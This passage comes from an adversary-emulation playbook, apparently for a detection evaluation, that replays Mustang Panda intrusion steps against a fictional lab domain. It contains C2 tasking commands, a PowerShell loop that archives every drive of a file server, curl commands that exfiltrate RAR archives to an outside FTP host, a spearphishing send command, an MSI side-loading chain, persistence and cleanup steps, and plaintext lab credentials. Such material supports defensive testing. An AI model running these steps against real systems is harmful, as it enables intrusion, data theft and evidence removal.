Mustang Panda then begins collecting and exfiltrating files of interest. By using a file list with file extensions and folders of interest, Mustang Panda uses the VS Code tunnel to execute WinRAR against several drives of the previously discovered file server conclave (10.55.3.105) to remotely compress files into 250 MB volumes. Then, Mustang Panda uses OPRHEUS to download and execute a renamed curl.exe and exfiltrate the created RAR archives to an adversary controlled FTP server hosted at 49.67.12.21

Procedures

☣️ Task TONESHELL to download files.txt to harrenhal (10.55.4.103)

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 3, "taskNum": 11, "payload": "files.txt", "args": "C:\\Users\\htargaryen\\Downloads\\files.txt"}'

Expected Output

  [DEBUG] 2025/07/29 14:34:12 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 14:34:22 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
   [INFO] 2025/07/29 14:34:23 Received SetTaskBySessionId request
[SUCCESS] 2025/07/29 14:34:23 Successfully set task for session: b7107b26bdc8e2eea0dc91c8e603370f
  [DEBUG] 2025/07/29 14:34:32 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 14:34:32 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 14:34:32 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 11: 82 bytes
  [DEBUG] 2025/07/29 14:34:32 [TONESHELL] Closed handle for file /opt/kalidev/mustang_panda/Resources/payloads/files.txt
   [INFO] 2025/07/29 14:34:32 [TONESHELL] Received task complete response from session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 11; task type: 3, exit code: 0. Registering task output.
[SUCCESS] 2025/07/29 14:34:32 [TONESHELL] Successfully downloaded file /opt/kalidev/mustang_panda/Resources/payloads/files.txt
  [DEBUG] 2025/07/29 14:34:42 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)
  [DEBUG] 2025/07/29 14:34:52 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)

☣️ Switch to the VS Code tunnel tab to the workstation harrenhal (10.55.4.103), open a PowerShell terminal if one is not already open, and execute rar.exe remotely against drives A-Z of the file server conclave (10.55.3.105)

65..90 | %{ $drive = [char]$_; & "C:\Program Files\WinRAR\rar.exe" a -r -v250m -hpj5Tft5lLFFcQK -x*\appdata\ -x*\ProgramData\* -x*\Recovery\* -x'*\System Volume Information\*' -x'*\$RECYCLE.BIN\*' -x'*\Program Files\*' -x'*\Program Files (x86)\*' -x*\Windows\* -x*\Python312\* -x*\crash_dumps\* -x*\PerfLogs\* -n@"C:\Users\htargaryen\Downloads\files.txt" "C:\Windows\Temp\${drive}.rar" "\\10.55.3.105\${drive}`$\*"}

Expected Output

RAR 7.11 x64   Copyright (c) 1993-2025 Alexander Roshal   20 Mar 2025
Trial version             Type 'rar -?' for help

Evaluation copy. Please register.

Creating archive A.rar

WARNING: No files

...

Creating archive C.rar

Adding    C:\...  OK
Adding    C:\...  OK
...

☣️ Switch back to the terminal and task TONESHELL to download curl.exe to harrenhal (10.55.4.103) as prpbg.dat.bak.1

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 3, "taskNum": 12, "payload": "curl.exe", "args": "C:\\Program Files\\Microsoft VS Code\\prpbg.dat.bak.1"}'

Expected Output

   [INFO] 2025/07/29 14:58:44 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 12: 32768 bytes
  [DEBUG] 2025/07/29 14:58:44 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 14:58:44 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 12: 32768 bytes
  [DEBUG] 2025/07/29 14:58:44 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 14:58:44 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 12: 32768 bytes
  [DEBUG] 2025/07/29 14:58:44 [TONESHELL] Received file chunk request from session ID b7107b26bdc8e2eea0dc91c8e603370f
   [INFO] 2025/07/29 14:58:44 [TONESHELL] Sent file chunk to session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 12: 11720 bytes
  [DEBUG] 2025/07/29 14:58:44 [TONESHELL] Closed handle for file /opt/kalidev/mustang_panda/Resources/payloads/curl.exe
   [INFO] 2025/07/29 14:58:44 [TONESHELL] Received task complete response from session ID b7107b26bdc8e2eea0dc91c8e603370f, task number 12; task type: 3, exit code: 0. Registering task output.
[SUCCESS] 2025/07/29 14:58:44 [TONESHELL] Successfully downloaded file /opt/kalidev/mustang_panda/Resources/payloads/curl.exe
  [DEBUG] 2025/07/29 14:58:54 [TONESHELL] Received task request from implant UUID 3718210df587044d8e052c2ba9d053fd (session ID b7107b26bdc8e2eea0dc91c8e603370f)

☣️ Task TONESHELL to use curl.exe and exfiltrate the RAR files

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task b7107b26bdc8e2eea0dc91c8e603370f '{"id": 5, "taskNum": 13, "args": "C:\\Program Files\\Microsoft VS Code\\prpbg.dat.bak.1 -T \"{C:\\\\windows\\\\temp\\\\C.rar,C:\\\\windows\\\\temp\\\\E.rar,C:\\\\windows\\\\temp\\\\F.rar,C:\\\\windows\\\\temp\\\\G.rar,C:\\\\windows\\\\temp\\\\H.rar,C:\\\\windows\\\\temp\\\\J.rar}\" ftp://ftp_user:Gracious-Coat@49.67.12.21/do/ --ftp-create-dirs"}'

Expected Output

   [TASK] 2025/07/29 15:03:58   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 10.0M    0     0  100 10.0M      0  13.1M --:--:-- --:--:-- --:--:-- 13.1M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0  64.2M --:--:-- --:--:-- --:--:-- 64.2M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0  76.1M --:--:-- --:--:-- --:--:-- 76.2M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0  65.7M --:--:-- --:--:-- --:--:-- 65.6M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0  75.2M --:--:-- --:--:-- --:--:-- 75.2M
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 42.1M    0     0  100 42.1M      0  71.8M --:--:-- --:--:-- --:--:-- 71.8M

☣️ In any terminal on Kali, confirm exfiltration of the rar files

Password
Barbed-Directive

sudo ls -la /srv/ftp/do

Expected Output

total 186024
drwx------ 2 ftp_user ftp_user     4096 Jun 18 21:03 .
drwxr-xr-x 5 ftp_user ftp_user     4096 Jun 18 21:03 ..
-rw------- 1 ftp_user ftp_user 13599534 Jun 18 21:03 C.rar
-rw------- 1 ftp_user ftp_user 88438606 Jun 18 21:03 E.rar
-rw------- 1 ftp_user ftp_user 88438606 Jun 18 21:03 F.rar
-rw------- 1 ftp_user ftp_user 88438606 Jun 18 21:03 G.rar
-rw------- 1 ftp_user ftp_user 88436622 Jun 18 21:03 H.rar
-rw------- 1 ftp_user ftp_user 88438606 Jun 18 21:03 J.rar

Return to the RDP to harrenhal (10.55.4.103). Close all windows then sign out.

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	Windows	code-tunnel.exe executed PowerShell commands	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to execute PowerShell commands	harrenhal (10.55.4.103)	htargaryen	-	26
Lateral Movement	T1021.002	Remote Services: SMB/Windows Admin Shares	Windows	code-tunnel.exe accessed shares of the file server `conclave (10.55.3.105)` remotely	Not Calibrated - Not Benign	Mustang Panda uses VS Code tunnel to remotely execute `rar.exe` against shares of the file server `conclave (10.55.3.105)`	conclave (10.55.3.105), harrenhal (10.55.4.103)	htargaryen	-	25, 26
Collection	T1560.001	Archive Collected Data: Archive via Utility	Windows	`rar.exe` compressed the A-Z shares of the file server `conclave (10.55.3.105)`	Not Calibrated - Not Benign	Mustang Panda uses `rar.exe` to compress the A-Z shares of the file server `conclave (10.55.3.105)`	conclave (10.55.3.105), harrenhal (10.55.4.103)	htargaryen	-	25, 26
Command and Control	T1105	Ingress Tool Transfer	Windows	waitfor.exe downloaded `curl.exe` as `C:\\Program Files\\Microsoft VS Code\\prpbg.dat.bak.1`	Not Calibrated - Not Benign	TONESHELL downloads `curl.exe` as `C:\\Program Files\\Microsoft VS Code\\prpbg.dat.bak.1`	harrenhal (10.55.4.103)	htargaryen	PerformFileDownloadTask	21
Exfiltration	T1048.003	Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol	Windows	waitfor.exe exfiltrated the RAR files over FTP to `49.67.12.21`	Calibrated - Not Benign	TONESHELL exfiltrates the RAR files over FTP to `49.67.12.21`	harrenhal (10.55.4.103)	htargaryen	PerformExecTask	19, 21

Step 7 - Initial Access

Voice Track

Mustang Panda sends a spearphishing email containing a link to the user ccole. When the user ccole clicks on the link to open in the browser, the browser will load the webpage (invite_doc.html) containing JavaScript that will initiate a download of the malicious MSI file 2025p2.msi to the user's workstation stepstones (10.55.4.104).

When the user executes the MSI installer 2025p2.msi, the installer drops the legitimate executable gup.exe, an auxiliary file gup.xml needed for proper execution of gup.exe, the Plug X loader libcurl.dll, the Plug X shellcode WinGUpdate.dat, and a decoy PDF Meeting Invitation.pdf. Then, the MSI installer 2025p2.msi executes the legitimate executable gup.exe, which DLL sideloads the Plug X loader libcurl.dll.

The Plug X loader displays the decoy PDF Meeting Invitation.pdf and decrypts and loads the Plug X shellcode WinGUpdate.dat into memory for execution. On execution, Plug X will establish an HTTPS-based C2 channel to ValarMorghulis.org:443

Procedures

From the jumpbox, initiate an RDP session to the workstation stepstones (10.55.4.104)

Destination Username Password

stepstones.kingslanding.net kingslanding\ccole Cruel-Bold
On the workstation stepstones (10.55.4.104), open FireFox and browse to the Outlook Web Access portal, logging in with ccole's credentials

Destination Username Password

https://sept.kingslanding.net/owa kingslanding\ccole Cruel-Bold

Destination	Username	Password
stepstones.kingslanding.net	kingslanding\ccole	Cruel-Bold

Destination	Username	Password
https://sept.kingslanding.net/owa	kingslanding\ccole	Cruel-Bold

☣️ Switch to the Kali machine and send the spearphishing email

python3 /opt/kalidev/mustang_panda/Resources/email_generation/send_email.py mail.lorath.com /opt/kalidev/mustang_panda/Resources/payloads/plugx_spearphishing.html -t ccole@kingslanding.net -f fantaryon@lorath.com -fn 'Ferrego Antaryon' -s 'Meeting Invitation'

Expected Output
```
Successfully sent email
```

Switch to the RDP session to the workstation stepstones (10.55.4.104) and confirm receipt of the spearphishing email
Open the email and click the link inside the email. After the browser opens the webpage, if the browser has paused the download due to a "Potential Security Risk" click on the pop-up then "Allow" to proceed with the Download. Open the Downloads folder to confirm download of the MSI installer 2025p2.msi
From the Downloads folder, double-click to open the MSI file 2025p2.msi and "Run". An MSI installer popup for "2025p2" should appear.
Click "Next" in the 2025p2 installer wizard to reach the installations options page. Make sure the selected installation folder is C:\Users\ccole\AppData\Local\EvRDRunMP\ and that installation is limited to just the current user. Continue clicking "Next" until the installation successfully completes, then click "Close" to exit the wizard. Confirm execution of Plug X shellcode and a new implant session in the C2 handler on the Kali machine.

☣️ Task Plug X to install persistence via registry key

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 123 '{"id": "0x1002"}'

Expected Output

Successfully set registry key and value.

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Initial Access	T1566.002	Phishing: Spearphishing Link	Windows	ccole received an email from fantaryon with a link http[:]mailstreamnet[.]com	Not Calibrated - Not Benign	Mustang Panda sends a spearphishing link to `ccole`	stepstones (10.55.4.104)	ccole	send_email.py	3, 9, 14, 17
Execution	T1204.001	User Execution: Malicious Link	Windows	ccole clicks on the spearphishing email link http[:]mailstreamnet[.]com	Calibrated - Not Benign	`ccole` clicks on the spearphishing email link	stepstones (10.55.4.104)	ccole	-	9, 14, 17
Defense Evasion	T1027.006	Obfuscated Files or Information: HTML Smuggling	Windows	`invite_doc.html` contains a JavaScript Blob	Calibrated - Not Benign	`invite_doc.html` contains a JavaScript Blob	stepstones (10.55.4.104)	ccole	JavaScript	3, 14
Execution	T1059.007	Command and Scripting Interpreter: JavaScript	Windows	`invite_doc.html` executes JavaScript	Not Calibrated - Not Benign	`invite_doc.html` executes JavaScript	stepstones (10.55.4.104)	ccole	-	1, 3
Command and Control	T1105	Ingress Tool Transfer	Windows	`invite_doc.html` downloads a malicious MSI file `2025p2.msi`	Calibrated - Not Benign	JavaScript in `invite_doc.html` downloads a malicious MSI file `2025p2.msi`	stepstones (10.55.4.104)	ccole	Javascript downloads file	3, 14
Execution	T1204.002	User Execution: Malicious File	Windows	`ccole` opens the MSI file `2025p2.msi`	Not Calibrated - Not Benign	`ccole` opens the MSI file `2025p2.msi`	stepstones (10.55.4.104)	ccole	-	1, 3
Persistence	T1218.007	System Binary Proxy Execution: Msiexec	Windows	`msiexec.exe` creates a new folder `%LOCALAPPDATA%\EvRDRunMP` containing `GUP.exe`,`gup.xml`,`libcurl.dll`, and`WinGUpdate.dat`	Calibrated - Not Benign	`msiexec.exe` creates a new folder `%LOCALAPPDATA%\EvRDRunMP` containing `GUP.exe`, `gup.xml`, `libcurl.dll`, and `WinGUpdate.dat`	stepstones (10.55.4.104)	ccole	-	3, 14
Defense Evasion	T1027.013	Obfuscated Files or Information: Encrypted/Encoded File	Windows	`WinGUpdate.dat` is encrypted using RC4	Calibrated - Not Benign	Plug X shellcode `WinGUpdate.dat` is encrypted using RC4	stepstones (10.55.4.104)	ccole	rc4_encrypt_file.py	3, 8, 14
Execution	T1218.007	System Binary Proxy Execution: Msiexec	Windows	`msiexec.exe` executes `GUP.exe`	Not Calibrated - Not Benign	`msiexec.exe` executes `GUP.exe`	stepstones (10.55.4.104)	ccole	-	3, 14
Defense Evasion	T1574.002	Hijack Execution Flow: DLL Side-Loading	Windows	`GUP.exe` sideloads `libcurl.dll`	Calibrated - Not Benign	Legitimate binary `GUP.exe` sideloads Plug X loader `libcurl.dll`	stepstones (10.55.4.104)	ccole	Exported function definitions	3, 7, 12, 14, 15
Defense Evasion	T1140	Deobfuscate/Decode Files or Information	Windows	`libcurl.dll` reads and decrypts `WinGUpdate.dat`	Calibrated - Not Benign	Plug X loader `libcurl.dll` reads and decrypts Plug X shellcode `WinGUpdate.dat`	stepstones (10.55.4.104)	ccole	Decrypt shellcode, Read shellcode, RC4.nim	3, 7, 8, 12, 14, 15
Defense Evasion	T1620	Reflective Code Loading	Windows	`libcurl.dll` loaded `WinGUpdate.dat` into memory	Calibrated - Not Benign	Plug X loader `libcurl.dll` loads the Plug X shellcode into memory	stepstones (10.55.4.104)	ccole	Decrypt/read shellcode, Load shellcode into memory	3, 7, 8, 12, 14
Defense Evasion	T1027.007	Obfuscated Files or Information: Dynamic API Resolution	Windows	gup.exe dynamically resolves Windows API calls at runtime using the FNV1A hash.	Calibrated - Not Benign	Plug X dynamically resolves Windows API calls at runtime using the FNV1A hash.	stepstones (10.55.4.104)	ccole	FetchFunctions	8, 13
Defense Evasion	T1036	Masquerading	Windows	gup.exe wrote a decoy PDF file `Meeting Invitation.pdf` to %TEMP%	Not Calibrated - Not Benign	Plug X writes the decoy PDF file `Meeting Invitation.pdf` to %TEMP% then opens it	stepstones (10.55.4.104)	ccole	HandleDecoyPDF	3, 14, 17
Command and Control	T1071.001	Application Layer Protocol: Web Protocols	Windows	gup.exe connected to `ValarMorghulis.org` over HTTPS	Calibrated - Not Benign	Plug X connects to `ValarMorghulis.org` over HTTPS	stepstones (10.55.4.104)	ccole	getRequest, readResponse, Set server, port, and HTTPS at build	7
Command and Control	T1573.002	Encrypted Channel: Asymmetric Cryptography	Windows	gup.exe leveraged HTTPS for encrypted communication with the C2	Calibrated - Not Benign	Plug X leverages HTTPS for encrypted communication with the C2	stepstones (10.55.4.104)	ccole	getRequest, Initialize HTTPS, Set HTTPS at build	2, 7
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder	Windows	gup.exe created a registry run key named `WinGupSvc`	Calibrated - Not Benign	Plug X creates a registry run key named `WinGupSvc`	stepstones (10.55.4.104)	ccole	HandleCreateRegistryRunKey	3, 7, 8, 12, 14, 15

Step 8 - Collection and Exfiltration

Voice Track

After establishing C2 with Plug X, Mustang Panda uses the RAR utility to locate and archive Microsoft Office, PDF, and text files. Mustang Panda then leverages curl to exfiltrate the RAR archive file.

Procedures

☣️ Task Plug X to use WinRAR to archive specific file types. Plug X will hang until the command has been completed. You may proceed once Plug X begins checking in to the C2 server again.

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 123 '{"id": "0x1000", "args":"cmd.exe /c \"\"C:\\Program Files\\WinRAR\\rar.exe\" a -r -m5 -ibck -ed -v325m -hpI1HcgjY7bWRA8 -inul -ta202504230000000 C:\\Users\\Public\\Documents\\b44d0xUT5BLOi.rar \"C:\\*.pdf\" \"C:\\*.doc*\" \"C:\\*.ppt*\" \"C:\\*.xls*\" \"C:\\users\\*.png\" \"C:\\users\\*.jpg\" \"C:\\users\\*.jpeg\"\""}'

☣️ Task Plug X to exfiltrate the RAR file using curl to the attacker FTP server

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 123 '{"id": "0x1000", "args": "cmd.exe /c \"curl.exe -T C:\\Users\\Public\\Documents\\b44d0xUT5BLOi.rar ftp://ftp_user:Gracious-Coat@49.67.12.21/dp/ --ftp-create-dirs\""}'

Expected Output

[SUCCESS] 2025/07/29 16:34:14 [Plug X] Reply from implant: 123
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 10.3M    0     0  100 10.3M      0  13.0M --:--:-- --:--:-- --:--:-- 13.0M

☣️ In any terminal on Kali, confirm the size of the exfiltrated rar file is not 0 bytes

Password
Barbed-Directive

sudo ls -la /srv/ftp/dp

Expected Output

total 9584
drwxr-xr-x 2 ftp_user ftp_user    4096 Jul 16 14:26 .
drwxr-xr-x 4 ftp_user ftp         4096 Jul 16 14:26 ..
-rw-r--r-- 1 ftp_user ftp_user 9804926 Jul 16 14:26 b44d0xUT5BLOi.rar

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Execution	T1059.003	Command and Scripting Interpreter: Windows Command Shell	Windows	gup.exe executed commands	Not Calibrated - Not Benign	Plug X executes commands	stepstones (10.55.4.104)	ccole	HandleExecuteCommand	3
Collection	T1005	Data from Local System	Windows	gup.exe executed `rar.exe` to search for specific file extensions	Calibrated - Not Benign	Plug X uses `rar.exe` to search for specific file extensions	stepstones (10.55.4.104)	ccole	-	1, 25
Collection	T1560.001	Archive Collected Data: Archive via Utility	Windows	gup.exe used `rar.exe` to create RAR archives	Calibrated - Not Benign	Plug X uses `rar.exe` to create RAR archives	stepstones (10.55.4.104)	ccole	-	23, 25
Exfiltration	T1048.003	Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol	Windows	gup.exe executed `curl.exe` to exfiltrate RAR archives to attacker FTP server `49.67.12.21`	Calibrated - Not Benign	Plug X uses `curl.exe` to exfiltrate RAR archives to attacker FTP server `49.67.12.21`	stepstones (10.55.4.104)	ccole	HandleExecuteCommand	23, 25

Step 9 - Indicator Removal

Voice Track

After exfiltrating files, Mustang Panda downloads batch script del_WinGupSvc.bat from the C2 server then executes it. On execution, the batch script del_WinGupSvc.bat deletes the registry run key, downloaded files, then itself.

Procedures

☣️ Task Plug X to download the cleanup batch script del_WinGupSvc.bat

python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 123 '{"id": "0x1003", "args": "%TEMP%\\del_WinGupSvc.bat", "file": "del_WinGupSvc.bat"}'

Expected Output
```
File saved successfully.
```

☣️ Task Plug X to execute the cleanup batch script del_WinGupSvc.bat. Plug X should stop checking in after the cleanup script is run. Wait at least 1 full minute to ensure Plug X does not continue to check in.
```
python3 /opt/kalidev/mustang_panda/Resources/controlServer/evalsC2client.py --set-task 123 '{"id": "0x1000", "args": "cmd.exe /c %TEMP%\\del_WinGupSvc.bat"}'
```

Reference Tables

Tactic	Technique ID	Technique Name	Platform	Detection Criteria	Category	Red Team Activity	Hosts	Users	Source Code Links	Relevant CTI Reports
Command and Control	T1105	Ingress Tool Transfer	Windows	gup.exe downloaded cleanup batch script to `%TEMP%\del_WinGupSvc.bat`	Not Calibrated - Not Benign	Plug X downloads cleanup batch script to `%TEMP%\del_WinGupSvc.bat`	stepstones (10.55.4.104)	ccole	HandleC2DownloadFile	3, 17
Execution	T1059.003	Command and Scripting Interpreter: Windows Command Shell	Windows	gup.exe executed the cleanup batch script `%TEMP%\del_WinGupSvc.bat`	Not Calibrated - Not Benign	Plug X executes the cleanup batch script `%TEMP%\del_WinGupSvc.bat`	stepstones (10.55.4.104)	ccole	HandleExecuteCommand	3, 17
Defense Evasion	T1070.009	Indicator Removal: Clear Persistence	Windows	`%TEMP%\del_WinGupSvc.bat` deletes the created registry key WinGupSvc	Not Calibrated - Not Benign	The cleanup batch script `%TEMP%\del_WinGupSvc.bat` deletes the created registry key	stepstones (10.55.4.104)	ccole	Delete registry key	3, 17
Defense Evasion	T1070.004	Indicator Removal: File Deletion	Windows	`%TEMP%\del_WinGupSvc.bat` deletes downloaded malicious files and itself	Not Calibrated - Not Benign	The cleanup batch script `%TEMP%\del_WinGupSvc.bat` deletes downloaded malicious files and itself	stepstones (10.55.4.104)	ccole	Delete malicious files, Delete self	3, 17

End of Scenario

Voice Track

The following procedures will terminate the C2 server and sign out of any remaining RDP sessions.

Procedures

From Kali, navigate to the terminal running the C2 server and terminate it via 'ctrl+c'.
Close all remaining terminal tabs via the 'exit' command.
On Kali, if Firefox is open, close any open tabs including tabs for https://vscode.dev/tunnel/redkeep and https://vscode.dev/tunnel/harrenhal.
Switch back to the RDP session to jumpbox. Sign out of your RDP session to the domain controller redkeep (10.55.3.100). Exit any open terminals and close any open tabs on the jumpbox.

FilesExpand file tree

Mustang_Panda_Scenario.md

Latest commit

History

Mustang_Panda_Scenario.md

File metadata and controls

Mustang Panda Scenario

Step 0 - Setup

Procedures

Step 1 - Initial Access

Voice Track

Procedures

Reference Tables

Step 2 - Discovery

Voice Track

Procedures

Reference Tables

Step 3 - Lateral Movement

Voice Track

Procedures

Reference Tables

Step 4 - Credential Access

Voice Track

Procedures

Reference Tables

Step 5 - Persistence

Voice Track

Procedures

Reference Tables

Step 6 - Collection and Exfiltration

Voice Track

Procedures

Reference Tables

Step 7 - Initial Access

Voice Track

Procedures

Reference Tables

Step 8 - Collection and Exfiltration

Voice Track

Procedures

Reference Tables

Step 9 - Indicator Removal

Voice Track

Procedures

Reference Tables

End of Scenario

Voice Track

Procedures